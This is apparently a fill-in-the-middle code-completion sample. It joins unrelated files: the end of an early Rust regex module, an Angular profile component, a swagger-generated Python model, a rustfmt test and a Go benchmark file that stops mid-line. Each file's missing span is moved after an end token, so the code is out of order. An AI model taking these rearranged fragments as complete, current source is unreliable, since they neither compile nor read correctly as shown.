about submatches). /// /// # Example /// /// We can use this to find all movie titles and their release years in /// some text, where the movie is formatted like "'Title' (xxxx)": /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let re = regex!(r"'(?P<title>[^']+)'\s+\((?P<year>\d{4})\)"); /// let text = "'Citizen Kane' (1941), 'The Wizard of Oz' (1939), 'M' (1931)."; /// for caps in re.captures_iter(text) { /// println!("Movie: {}, Released: {}", caps.name("title"), caps.name("year")); /// } /// // Output: /// // Movie: Citizen Kane, Released: 1941 /// // Movie: The Wizard of Oz, Released: 1939 /// // Movie: M, Released: 1931 /// # } /// ``` pub fn captures_iter<'r, 't>(&'r self, text: &'t str) -> FindCaptures<'r, 't> { FindCaptures { re: self, search: text, last_match: None, last_end: 0, } } /// Returns an iterator of substrings of `text` delimited by a match /// of the regular expression. /// Namely, each element of the iterator corresponds to text that *isn't* /// matched by the regular expression. /// /// This method will *not* copy the text given. /// /// # Example /// /// To split a string delimited by arbitrary amounts of spaces or tabs: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let re = regex!(r"[ \t]+"); /// let fields: Vec<&str> = re.split("a b \t c\td e").collect(); /// assert_eq!(fields, vec!("a", "b", "c", "d", "e")); /// # } /// ``` pub fn split<'r, 't>(&'r self, text: &'t str) -> RegexSplits<'r, 't> { RegexSplits { finder: self.find_iter(text), last: 0, } } /// Returns an iterator of at most `limit` substrings of `text` delimited /// by a match of the regular expression. (A `limit` of `0` will return no /// substrings.) /// Namely, each element of the iterator corresponds to text that *isn't* /// matched by the regular expression. /// The remainder of the string that is not split will be the last element /// in the iterator. /// /// This method will *not* copy the text given. /// /// # Example /// /// Get the first two words in some text: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let re = regex!(r"\W+"); /// let fields: Vec<&str> = re.splitn("Hey! How are you?", 3).collect(); /// assert_eq!(fields, vec!("Hey", "How", "are you?")); /// # } /// ``` pub fn splitn<'r, 't>(&'r self, text: &'t str, limit: uint) -> RegexSplitsN<'r, 't> { RegexSplitsN { splits: self.split(text), cur: 0, limit: limit, } } /// Replaces the leftmost-first match with the replacement provided. /// The replacement can be a regular string (where `$N` and `$name` are /// expanded to match capture groups) or a function that takes the matches' /// `Captures` and returns the replaced string. /// /// If no match is found, then a copy of the string is returned unchanged. /// /// # Examples /// /// Note that this function is polymorphic with respect to the replacement. /// In typical usage, this can just be a normal string: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let re = regex!("[^01]+"); /// assert_eq!(re.replace("1078910", "").as_slice(), "1010"); /// # } /// ``` /// /// But anything satisfying the `Replacer` trait will work. For example, /// a closure of type `|&Captures| -> StrBuf` provides direct access to the /// captures corresponding to a match. This allows one to access /// submatches easily: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # use regex::Captures; fn main() { /// let re = regex!(r"([^,\s]+),\s+(\S+)"); /// let result = re.replace("Springsteen, Bruce", |caps: &Captures| { /// format_strbuf!("{} {}", caps.at(2), caps.at(1)) /// }); /// assert_eq!(result.as_slice(), "Bruce Springsteen"); /// # } /// ``` /// /// But this is a bit cumbersome to use all the time. Instead, a simple /// syntax is supported that expands `$name` into the corresponding capture /// group. Here's the last example, but using this expansion technique /// with named capture groups: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let re = regex!(r"(?P<last>[^,\s]+),\s+(?P<first>\S+)"); /// let result = re.replace("Springsteen, Bruce", "$first $last"); /// assert_eq!(result.as_slice(), "Bruce Springsteen"); /// # } /// ``` /// /// Note that using `$2` instead of `$first` or `$1` instead of `$last` /// would produce the same result. To write a literal `$` use `$$`. /// /// Finally, sometimes you just want to replace a literal string with no /// submatch expansion. This can be done by wrapping a string with /// `NoExpand`: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// use regex::NoExpand; /// /// let re = regex!(r"(?P<last>[^,\s]+),\s+(\S+)"); /// let result = re.replace("Springsteen, Bruce", NoExpand("$2 $last")); /// assert_eq!(result.as_slice(), "$2 $last"); /// # } /// ``` pub fn replace<R: Replacer>(&self, text: &str, rep: R) -> StrBuf { self.replacen(text, 1, rep) } /// Replaces all non-overlapping matches in `text` with the /// replacement provided. This is the same as calling `replacen` with /// `limit` set to `0`. /// /// See the documentation for `replace` for details on how to access /// submatches in the replacement string. pub fn replace_all<R: Replacer>(&self, text: &str, rep: R) -> StrBuf { self.replacen(text, 0, rep) } /// Replaces at most `limit` non-overlapping matches in `text` with the /// replacement provided. If `limit` is 0, then all non-overlapping matches /// are replaced. /// /// See the documentation for `replace` for details on how to access /// submatches in the replacement string. pub fn replacen<R: Replacer> (&self, text: &str, limit: uint, mut rep: R) -> StrBuf { let mut new = StrBuf::with_capacity(text.len()); let mut last_match = 0u; for (i, cap) in self.captures_iter(text).enumerate() { // It'd be nicer to use the 'take' iterator instead, but it seemed // awkward given that '0' => no limit. if limit > 0 && i >= limit { break } let (s, e) = cap.pos(0).unwrap(); // captures only reports matches new.push_str(text.slice(last_match, s)); new.push_str(rep.reg_replace(&cap).as_slice()); last_match = e; } new.append(text.slice(last_match, text.len())) } } /// NoExpand indicates literal string replacement. /// /// It can be used with `replace` and `replace_all` to do a literal /// string replacement without expanding `$name` to their corresponding /// capture groups. /// /// `'r` is the lifetime of the literal text. pub struct NoExpand<'t>(pub &'t str); /// Replacer describes types that can be used to replace matches in a string. pub trait Replacer { /// Returns a possibly owned string that is used to replace the match /// corresponding the the `caps` capture group. /// /// The `'a` lifetime refers to the lifetime of a borrowed string when /// a new owned string isn't needed (e.g., for `NoExpand`). fn reg_replace<'a>(&'a mut self, caps: &Captures) -> MaybeOwned<'a>; } impl<'t> Replacer for NoExpand<'t> { fn reg_replace<'a>(&'a mut self, _: &Captures) -> MaybeOwned<'a> { let NoExpand(s) = *self; Slice(s) } } impl<'t> Replacer for &'t str { fn reg_replace<'a>(&'a mut self, caps: &Captures) -> MaybeOwned<'a> { Owned(caps.expand(*self).into_owned()) } } impl<'a> Replacer for |&Captures|: 'a -> StrBuf { fn reg_replace<'r>(&'r mut self, caps: &Captures) -> MaybeOwned<'r> { Owned((*self)(caps).into_owned()) } } /// Yields all substrings delimited by a regular expression match. /// /// `'r` is the lifetime of the compiled expression and `'t` is the lifetime /// of the string being split. pub struct RegexSplits<'r, 't> { finder: FindMatches<'r, 't>, last: uint, }<|fim▁hole|> impl<'r, 't> Iterator<&'t str> for RegexSplits<'r, 't> { fn next(&mut self) -> Option<&'t str> { let text = self.finder.search; match self.finder.next() { None => { if self.last >= text.len() { None } else { let s = text.slice(self.last, text.len()); self.last = text.len(); Some(s) } } Some((s, e)) => { let matched = text.slice(self.last, s); self.last = e; Some(matched) } } } } /// Yields at most `N` substrings delimited by a regular expression match. /// /// The last substring will be whatever remains after splitting. /// /// `'r` is the lifetime of the compiled expression and `'t` is the lifetime /// of the string being split. pub struct RegexSplitsN<'r, 't> { splits: RegexSplits<'r, 't>, cur: uint, limit: uint, } impl<'r, 't> Iterator<&'t str> for RegexSplitsN<'r, 't> { fn next(&mut self) -> Option<&'t str> { let text = self.splits.finder.search; if self.cur >= self.limit { None } else { self.cur += 1; if self.cur >= self.limit { Some(text.slice(self.splits.last, text.len())) } else { self.splits.next() } } } } /// Captures represents a group of captured strings for a single match. /// /// The 0th capture always corresponds to the entire match. Each subsequent /// index corresponds to the next capture group in the regex. /// If a capture group is named, then the matched string is *also* available /// via the `name` method. (Note that the 0th capture is always unnamed and so /// must be accessed with the `at` method.) /// /// Positions returned from a capture group are always byte indices. /// /// `'t` is the lifetime of the matched text. pub struct Captures<'t> { text: &'t str, locs: CaptureLocs, named: Option<HashMap<StrBuf, uint>>, } impl<'t> Captures<'t> { fn new(re: &Regex, search: &'t str, locs: CaptureLocs) -> Option<Captures<'t>> { if !has_match(&locs) { return None } let named = if re.names.len() == 0 { None } else { let mut named = HashMap::new(); for (i, name) in re.names.iter().enumerate() { match name { &None => {}, &Some(ref name) => { named.insert(name.to_strbuf(), i); } } } Some(named) }; Some(Captures { text: search, locs: locs, named: named, }) } /// Returns the start and end positions of the Nth capture group. /// Returns `None` if `i` is not a valid capture group or if the capture /// group did not match anything. /// The positions returned are *always* byte indices with respect to the /// original string matched. pub fn pos(&self, i: uint) -> Option<(uint, uint)> { let (s, e) = (i * 2, i * 2 + 1); if e >= self.locs.len() || self.locs.get(s).is_none() { // VM guarantees that each pair of locations are both Some or None. return None } Some((self.locs.get(s).unwrap(), self.locs.get(e).unwrap())) } /// Returns the matched string for the capture group `i`. /// If `i` isn't a valid capture group or didn't match anything, then the /// empty string is returned. pub fn at(&self, i: uint) -> &'t str { match self.pos(i) { None => "", Some((s, e)) => { self.text.slice(s, e) } } } /// Returns the matched string for the capture group named `name`. /// If `name` isn't a valid capture group or didn't match anything, then /// the empty string is returned. pub fn name(&self, name: &str) -> &'t str { match self.named { None => "", Some(ref h) => { match h.find_equiv(&name) { None => "", Some(i) => self.at(*i), } } } } /// Creates an iterator of all the capture groups in order of appearance /// in the regular expression. pub fn iter(&'t self) -> SubCaptures<'t> { SubCaptures { idx: 0, caps: self, } } /// Creates an iterator of all the capture group positions in order of /// appearance in the regular expression. Positions are byte indices /// in terms of the original string matched. pub fn iter_pos(&'t self) -> SubCapturesPos<'t> { SubCapturesPos { idx: 0, caps: self, } } /// Expands all instances of `$name` in `text` to the corresponding capture /// group `name`. /// /// `name` may be an integer corresponding to the index of the /// capture group (counted by order of opening parenthesis where `0` is the /// entire match) or it can be a name (consisting of letters, digits or /// underscores) corresponding to a named capture group. /// /// If `name` isn't a valid capture group (whether the name doesn't exist or /// isn't a valid index), then it is replaced with the empty string. /// /// To write a literal `$` use `$$`. pub fn expand(&self, text: &str) -> StrBuf { // How evil can you get? // FIXME: Don't use regexes for this. It's completely unnecessary. let re = Regex::new(r"(^|[^$]|\b)\$(\w+)").unwrap(); let text = re.replace_all(text, |refs: &Captures| -> StrBuf { let (pre, name) = (refs.at(1), refs.at(2)); format_strbuf!("{}{}", pre, match from_str::<uint>(name.as_slice()) { None => self.name(name).to_strbuf(), Some(i) => self.at(i).to_strbuf(), }) }); let re = Regex::new(r"\$\$").unwrap(); re.replace_all(text.as_slice(), NoExpand("$")) } } impl<'t> Container for Captures<'t> { /// Returns the number of captured groups. #[inline] fn len(&self) -> uint { self.locs.len() / 2 } } /// An iterator over capture groups for a particular match of a regular /// expression. /// /// `'t` is the lifetime of the matched text. pub struct SubCaptures<'t> { idx: uint, caps: &'t Captures<'t>, } impl<'t> Iterator<&'t str> for SubCaptures<'t> { fn next(&mut self) -> Option<&'t str> { if self.idx < self.caps.len() { self.idx += 1; Some(self.caps.at(self.idx - 1)) } else { None } } } /// An iterator over capture group positions for a particular match of a /// regular expression. /// /// Positions are byte indices in terms of the original string matched. /// /// `'t` is the lifetime of the matched text. pub struct SubCapturesPos<'t> { idx: uint, caps: &'t Captures<'t>, } impl<'t> Iterator<Option<(uint, uint)>> for SubCapturesPos<'t> { fn next(&mut self) -> Option<Option<(uint, uint)>> { if self.idx < self.caps.len() { self.idx += 1; Some(self.caps.pos(self.idx - 1)) } else { None } } } /// An iterator that yields all non-overlapping capture groups matching a /// particular regular expression. The iterator stops when no more matches can /// be found. /// /// `'r` is the lifetime of the compiled expression and `'t` is the lifetime /// of the matched string. pub struct FindCaptures<'r, 't> { re: &'r Regex, search: &'t str, last_match: Option<uint>, last_end: uint, } impl<'r, 't> Iterator<Captures<'t>> for FindCaptures<'r, 't> { fn next(&mut self) -> Option<Captures<'t>> { if self.last_end > self.search.len() { return None } let caps = exec_slice(self.re, Submatches, self.search, self.last_end, self.search.len()); let (s, e) = if !has_match(&caps) { return None } else { (caps.get(0).unwrap(), caps.get(1).unwrap()) }; // Don't accept empty matches immediately following a match. // i.e., no infinite loops please. if e == s && Some(self.last_end) == self.last_match { self.last_end += 1; return self.next() } self.last_end = e; self.last_match = Some(self.last_end); Captures::new(self.re, self.search, caps) } } /// An iterator over all non-overlapping matches for a particular string. /// /// The iterator yields a tuple of integers corresponding to the start and end /// of the match. The indices are byte offsets. The iterator stops when no more /// matches can be found. /// /// `'r` is the lifetime of the compiled expression and `'t` is the lifetime /// of the matched string. pub struct FindMatches<'r, 't> { re: &'r Regex, search: &'t str, last_match: Option<uint>, last_end: uint, } impl<'r, 't> Iterator<(uint, uint)> for FindMatches<'r, 't> { fn next(&mut self) -> Option<(uint, uint)> { if self.last_end > self.search.len() { return None } let caps = exec_slice(self.re, Location, self.search, self.last_end, self.search.len()); let (s, e) = if !has_match(&caps) { return None } else { (caps.get(0).unwrap(), caps.get(1).unwrap()) }; // Don't accept empty matches immediately following a match. // i.e., no infinite loops please. if e == s && Some(self.last_end) == self.last_match { self.last_end += 1; return self.next() } self.last_end = e; self.last_match = Some(self.last_end); Some((s, e)) } } fn exec(re: &Regex, which: MatchKind, input: &str) -> CaptureLocs { exec_slice(re, which, input, 0, input.len()) } fn exec_slice(re: &Regex, which: MatchKind, input: &str, s: uint, e: uint) -> CaptureLocs { match re.p { Dynamic(ref prog) => vm::run(which, prog, input, s, e), Native(exec) => exec(which, input, s, e), } } #[inline] fn has_match(caps: &CaptureLocs) -> bool { caps.len() >= 2 && caps.get(0).is_some() && caps.get(1).is_some() }<|fim▁end|>
<|file_name|>user-profile.component.ts<|end_file_name|><|fim▁begin|>import {Component, EventEmitter, Output, Input, OnInit} from '@angular/core'; import {UserModel, UserResponse} from "../user-management/user.model"; import {UserService} from "../user-management/user.service"; import {Config} from "../../../shared/configs/general.config"; @Component({ selector: 'user-profile', templateUrl: './user-profile.html' }) export class UserProfileComponent implements OnInit { // @Input showInfo:boolean; @Input() userId:string; @Output() userEditEvent:EventEmitter<any> = new EventEmitter(); @Input() showView:boolean; objUser:UserModel = new UserModel(); objResponse:UserResponse = new UserResponse(); imageSrc:string=Config.DefaultAvatar; ngOnInit() { this.getUserDetail(); } constructor(private _objUserService:UserService) { } getUserDetail() { this._objUserService.getUserDetail(this.userId) .subscribe(resUser => this.bindDetail(resUser), error => this.errorMessage(error)); } errorMessage(objResponse:any) { swal("Alert !", objResponse.message, "info"); } bindDetail(objUser:UserModel) { this.objUser = objUser; if (!this.objUser.imageName) this.imageSrc = Config.DefaultAvatar; else { let cl = Config.Cloudinary; this.imageSrc = cl.url(this.objUser.imageName, {transformation: [{width: 100, crop: "scale"}]}); } } onShowView(args) { if (!args) // isCanceled this.getUserDetail(); this.showView = true; }<|fim▁hole|> } }<|fim▁end|>
onShowEdit() { this.showView = false;
<|file_name|>video_search_result.py<|end_file_name|><|fim▁begin|># coding: utf-8 """ Picarto.TV API Documentation The Picarto.TV API documentation Note, for fixed access tokens, the header that needs to be sent is of the format: `Authorization: Bearer yourTokenHere` This can be generated at https://oauth.picarto.tv/ For chat API, see https://docs.picarto.tv/chat/chat.proto - contact via the email below for implementation details OpenAPI spec version: 1.2.5 Contact: [email protected] Generated by: https://github.com/swagger-api/swagger-codegen.git """ from pprint import pformat from six import iteritems import re class VideoSearchResult(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'channel': 'BasicChannelInfo', 'video': 'ChannelVideo' } attribute_map = { 'channel': 'channel', 'video': 'video' } def __init__(self, channel=None, video=None): """ VideoSearchResult - a model defined in Swagger """ self._channel = None self._video = None if channel is not None: self.channel = channel if video is not None:<|fim▁hole|> self.video = video @property def channel(self): """ Gets the channel of this VideoSearchResult. :return: The channel of this VideoSearchResult. :rtype: BasicChannelInfo """ return self._channel @channel.setter def channel(self, channel): """ Sets the channel of this VideoSearchResult. :param channel: The channel of this VideoSearchResult. :type: BasicChannelInfo """ self._channel = channel @property def video(self): """ Gets the video of this VideoSearchResult. :return: The video of this VideoSearchResult. :rtype: ChannelVideo """ return self._video @video.setter def video(self, video): """ Sets the video of this VideoSearchResult. :param video: The video of this VideoSearchResult. :type: ChannelVideo """ self._video = video def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ if not isinstance(other, VideoSearchResult): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other<|fim▁end|>
<|file_name|>configs-where_pred_indent-block.rs<|end_file_name|><|fim▁begin|>// rustfmt-where_pred_indent: Block // Where predicate indent <|fim▁hole|> Sit: Eq, Amet: Eq, { // body }<|fim▁end|>
fn lorem<Ipsum, Dolor, Sit, Amet>() -> T where Ipsum: Eq, Dolor: Eq,
<|file_name|>bench_test.go<|end_file_name|><|fim▁begin|>// Copyright ©2016 The Gonum Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package f32 import "testing" const ( benchLen = 1e5 a = 2 ) var ( x = make([]float32, benchLen) y = make([]float32, benchLen) z = make([]float32, benchLen) ) func init() { for n := range x { x[n] = float32(n) y[n] = float32(n) } } func benchaxpyu(t *testing.B, n int, f func(a float32, x, y []float32)) { x, y := x[:n], y[:n] for i := 0; i < t.N; i++ { f(a, x, y) } } func naiveaxpyu(a float32, x, y []float32) { for i, v := range x { y[i] += a * v } } func BenchmarkF32AxpyUnitary1(t *testing.B) { benchaxpyu(t, 1, AxpyUnitary) } func BenchmarkF32AxpyUnitary2(t *testing.B) { benchaxpyu(t, 2, AxpyUnitary) } func BenchmarkF32AxpyUnitary3(t *testing.B) { benchaxpyu(t, 3, AxpyUnitary) } func BenchmarkF32AxpyUnitary4(t *testing.B) { benchaxpyu(t, 4, AxpyUnitary) } func BenchmarkF32AxpyUnitary5(t *testing.B) { benchaxpyu(t, 5, AxpyUnitary) } func BenchmarkF32AxpyUnitary10(t *testing.B) { benchaxpyu(t, 10, AxpyUnitary) } func BenchmarkF32AxpyUnitary100(t *testing.B) { benchaxpyu(t, 100, AxpyUnitary) } func BenchmarkF32AxpyUnitary1000(t *testing.B) { benchaxpyu(t, 1000, AxpyUnitary) } func BenchmarkF32AxpyUnitary5000(t *testing.B) { benchaxpyu(t, 5000, AxpyUnitary) } func BenchmarkF32AxpyUnitary10000(t *testing.B) { benchaxpyu(t, 10000, AxpyUnitary) } func BenchmarkF32AxpyUnitary50000(t *testing.B) { benchaxpyu(t, 50000, AxpyUnitary) } func BenchmarkLF32AxpyUnitary1(t *testing.B) { benchaxpyu(t, 1, naiveaxpyu) } func BenchmarkLF32AxpyUnitary2(t *testing.B) { benchaxpyu(t, 2, naiveaxpyu) } func BenchmarkLF32AxpyUnitary3(t *testing.B) { benchaxpyu(t, 3, naiveaxpyu) } func BenchmarkLF32AxpyUnitary4(t *testing.B) { benchaxpyu(t, 4, naiveaxpyu) } func BenchmarkLF32AxpyUnitary5(t *testing.B) { benchaxpyu(t, 5, naiveaxpyu) } func BenchmarkLF32AxpyUnitary10(t *testing.B) { benchaxpyu(t, 10, naiveaxpyu) } func BenchmarkLF32AxpyUnitary100(t *testing.B) { benchaxpyu(t, 100, naiveaxpyu) } func BenchmarkLF32AxpyUnitary1000(t *testing.B) { benchaxpyu(t, 1000, naiveaxpyu) } func BenchmarkLF32AxpyUnitary5000(t *testing.B) { benchaxpyu(t, 5000, naiveaxpyu) } func BenchmarkLF32AxpyUnitary10000(t *testing.B) { benchaxpyu(t, 10000, naiveaxpyu) } func BenchmarkLF32AxpyUnitary50000(t *testing.B) { benchaxpyu(t, 50000, naiveaxpyu) } func benchaxpyut(t *testing.B, n int, f func(d []float32, a float32, x, y []float32)) { x, y, z := x[:n], y[:n], z[:n] for i := 0; i < t.N; i++ { f(z, a, x, y) } } func naiveaxpyut(d []float32, a float32, x, y []float32) { for i, v := range x { d[i] = y[i] + a*v } } func BenchmarkF32AxpyUnitaryTo1(t *testing.B) { benchaxpyut(t, 1, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo2(t *testing.B) { benchaxpyut(t, 2, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo3(t *testing.B) { benchaxpyut(t, 3, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo4(t *testing.B) { benchaxpyut(t, 4, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo5(t *testing.B) { benchaxpyut(t, 5, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo10(t *testing.B) { benchaxpyut(t, 10, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo100(t *testing.B) { benchaxpyut(t, 100, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo1000(t *testing.B) { benchaxpyut(t, 1000, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo5000(t *testing.B) { benchaxpyut(t, 5000, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo10000(t *testing.B) { benchaxpyut(t, 10000, AxpyUnitaryTo) } func BenchmarkF32AxpyUnitaryTo50000(t *testing.B) { benchaxpyut(t, 50000, AxpyUnitaryTo) } func BenchmarkLF32AxpyUnitaryTo1(t *testing.B) { benchaxpyut(t, 1, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo2(t *testing.B) { benchaxpyut(t, 2, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo3(t *testing.B) { benchaxpyut(t, 3, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo4(t *testing.B) { benchaxpyut(t, 4, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo5(t *testing.B) { benchaxpyut(t, 5, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo10(t *testing.B) { benchaxpyut(t, 10, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo100(t *testing.B) { benchaxpyut(t, 100, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo1000(t *testing.B) { benchaxpyut(t, 1000, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo5000(t *testing.B) { benchaxpyut(t, 5000, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo10000(t *testing.B) { benchaxpyut(t, 10000, naiveaxpyut) } func BenchmarkLF32AxpyUnitaryTo50000(t *testing.B) { benchaxpyut(t, 50000, naiveaxpyut) } func benchaxpyinc(t *testing.B, ln, t_inc int, f func(alpha float32, x, y []float32, n, incX, incY, ix, iy uintptr)) { n, inc := uintptr(ln), uintptr(t_inc) var idx int if t_inc < 0 { idx = (-ln + 1) * t_inc<|fim▁hole|> } for i := 0; i < t.N; i++ { f(1, x, y, n, inc, inc, uintptr(idx), uintptr(idx)) } } func naiveaxpyinc(alpha float32, x, y []float32, n, incX, incY, ix, iy uintptr) { for i := 0; i < int(n); i++ { y[iy] += alpha * x[ix] ix += incX iy += incY } } func BenchmarkF32AxpyIncN1Inc1(b *testing.B) { benchaxpyinc(b, 1, 1, AxpyInc) } func BenchmarkF32AxpyIncN2Inc1(b *testing.B) { benchaxpyinc(b, 2, 1, AxpyInc) } func BenchmarkF32AxpyIncN2Inc2(b *testing.B) { benchaxpyinc(b, 2, 2, AxpyInc) } func BenchmarkF32AxpyIncN2Inc4(b *testing.B) { benchaxpyinc(b, 2, 4, AxpyInc) } func BenchmarkF32AxpyIncN2Inc10(b *testing.B) { benchaxpyinc(b, 2, 10, AxpyInc) } func BenchmarkF32AxpyIncN3Inc1(b *testing.B) { benchaxpyinc(b, 3, 1, AxpyInc) } func BenchmarkF32AxpyIncN3Inc2(b *testing.B) { benchaxpyinc(b, 3, 2, AxpyInc) } func BenchmarkF32AxpyIncN3Inc4(b *testing.B) { benchaxpyinc(b, 3, 4, AxpyInc) } func BenchmarkF32AxpyIncN3Inc10(b *testing.B) { benchaxpyinc(b, 3, 10, AxpyInc) } func BenchmarkF32AxpyIncN4Inc1(b *testing.B) { benchaxpyinc(b, 4, 1, AxpyInc) } func BenchmarkF32AxpyIncN4Inc2(b *testing.B) { benchaxpyinc(b, 4, 2, AxpyInc) } func BenchmarkF32AxpyIncN4Inc4(b *testing.B) { benchaxpyinc(b, 4, 4, AxpyInc) } func BenchmarkF32AxpyIncN4Inc10(b *testing.B) { benchaxpyinc(b, 4, 10, AxpyInc) } func BenchmarkF32AxpyIncN10Inc1(b *testing.B) { benchaxpyinc(b, 10, 1, AxpyInc) } func BenchmarkF32AxpyIncN10Inc2(b *testing.B) { benchaxpyinc(b, 10, 2, AxpyInc) } func BenchmarkF32AxpyIncN10Inc4(b *testing.B) { benchaxpyinc(b, 10, 4, AxpyInc) } func BenchmarkF32AxpyIncN10Inc10(b *testing.B) { benchaxpyinc(b, 10, 10, AxpyInc) } func BenchmarkF32AxpyIncN1000Inc1(b *testing.B) { benchaxpyinc(b, 1000, 1, AxpyInc) } func BenchmarkF32AxpyIncN1000Inc2(b *testing.B) { benchaxpyinc(b, 1000, 2, AxpyInc) } func BenchmarkF32AxpyIncN1000Inc4(b *testing.B) { benchaxpyinc(b, 1000, 4, AxpyInc) } func BenchmarkF32AxpyIncN1000Inc10(b *testing.B) { benchaxpyinc(b, 1000, 10, AxpyInc) } func BenchmarkF32AxpyIncN100000Inc1(b *testing.B) { benchaxpyinc(b, 100000, 1, AxpyInc) } func BenchmarkF32AxpyIncN100000Inc2(b *testing.B) { benchaxpyinc(b, 100000, 2, AxpyInc) } func BenchmarkF32AxpyIncN100000Inc4(b *testing.B) { benchaxpyinc(b, 100000, 4, AxpyInc) } func BenchmarkF32AxpyIncN100000Inc10(b *testing.B) { benchaxpyinc(b, 100000, 10, AxpyInc) } func BenchmarkF32AxpyIncN100000IncM1(b *testing.B) { benchaxpyinc(b, 100000, -1, AxpyInc) } func BenchmarkF32AxpyIncN100000IncM2(b *testing.B) { benchaxpyinc(b, 100000, -2, AxpyInc) } func BenchmarkF32AxpyIncN100000IncM4(b *testing.B) { benchaxpyinc(b, 100000, -4, AxpyInc) } func BenchmarkF32AxpyIncN100000IncM10(b *testing.B) { benchaxpyinc(b, 100000, -10, AxpyInc) } func BenchmarkLF32AxpyIncN1Inc1(b *testing.B) { benchaxpyinc(b, 1, 1, naiveaxpyinc) } func BenchmarkLF32AxpyIncN2Inc1(b *testing.B) { benchaxpyinc(b, 2, 1, naiveaxpyinc) } func BenchmarkLF32AxpyIncN2Inc2(b *testing.B) { benchaxpyinc(b, 2, 2, naiveaxpyinc) } func BenchmarkLF32AxpyIncN2Inc4(b *testing.B) { benchaxpyinc(b, 2, 4, naiveaxpyinc) } func BenchmarkLF32AxpyIncN2Inc10(b *testing.B) { benchaxpyinc(b, 2, 10, naiveaxpyinc) } func BenchmarkLF32AxpyIncN3Inc1(b *testing.B) { benchaxpyinc(b, 3, 1, naiveaxpyinc) } func BenchmarkLF32AxpyIncN3Inc2(b *testing.B) { benchaxpyinc(b, 3, 2, naiveaxpyinc) } func BenchmarkLF32AxpyIncN3Inc4(b *testing.B) { benchaxpyinc(b, 3, 4, naiveaxpyinc) } func BenchmarkLF32AxpyIncN3Inc10(b *testing.B) { benchaxpyinc(b, 3, 10, naiveaxpyinc) } func BenchmarkLF32AxpyIncN4Inc1(b *testing.B) { benchaxpyinc(b, 4, 1, naiveaxpyinc) } func BenchmarkLF32AxpyIncN4Inc2(b *testing.B) { benchaxpyinc(b, 4, 2, naiveaxpyinc) } func BenchmarkLF32AxpyIncN4Inc4(b *testing.B) { benchaxpyinc(b, 4, 4, naiveaxpyinc) } func BenchmarkLF32AxpyIncN4Inc10(b *testing.B) { benchaxpyinc(b, 4, 10, naiveaxpyinc) } func BenchmarkLF32AxpyIncN10Inc1(b *testing.B) { benchaxpyinc(b, 10, 1, naiveaxpyinc) } func BenchmarkLF32AxpyIncN10Inc2(b *testing.B) { benchaxpyinc(b, 10, 2, naiveaxpyinc) } func BenchmarkLF32AxpyIncN10Inc4(b *testing.B) { benchaxpyinc(b, 10, 4, naiveaxpyinc) } func BenchmarkLF32AxpyIncN10Inc10(b *testing.B) { benchaxpyinc(b, 10, 10, naiveaxpyinc) } func BenchmarkLF32AxpyIncN1000Inc1(b *testing.B) { benchaxpyinc(b, 1000, 1, naiveaxpyinc) } func BenchmarkLF32AxpyIncN1000Inc2(b *testing.B) { benchaxpyinc(b, 1000, 2, naiveaxpyinc) } func BenchmarkLF32AxpyIncN1000Inc4(b *testing.B) { benchaxpyinc(b, 1000, 4, naiveaxpyinc) } func BenchmarkLF32AxpyIncN1000Inc10(b *testing.B) { benchaxpyinc(b, 1000, 10, naiveaxpyinc) } func BenchmarkLF32AxpyIncN100000Inc1(b *testing.B) { benchaxpyinc(b, 100000, 1, naiveaxpyinc) } func BenchmarkLF32AxpyIncN100000Inc2(b *testing.B) { benchaxpyinc(b, 100000, 2, naiveaxpyinc) } func BenchmarkLF32AxpyIncN100000Inc4(b *testing.B) { benchaxpyinc(b, 100000, 4, naiveaxpyinc) } func BenchmarkLF32AxpyIncN100000Inc10(b *testing.B) { benchaxpyinc(b, 100000, 10, naiveaxpyinc) } func BenchmarkLF32AxpyIncN100000IncM1(b *testing.B) { benchaxpyinc(b, 100000, 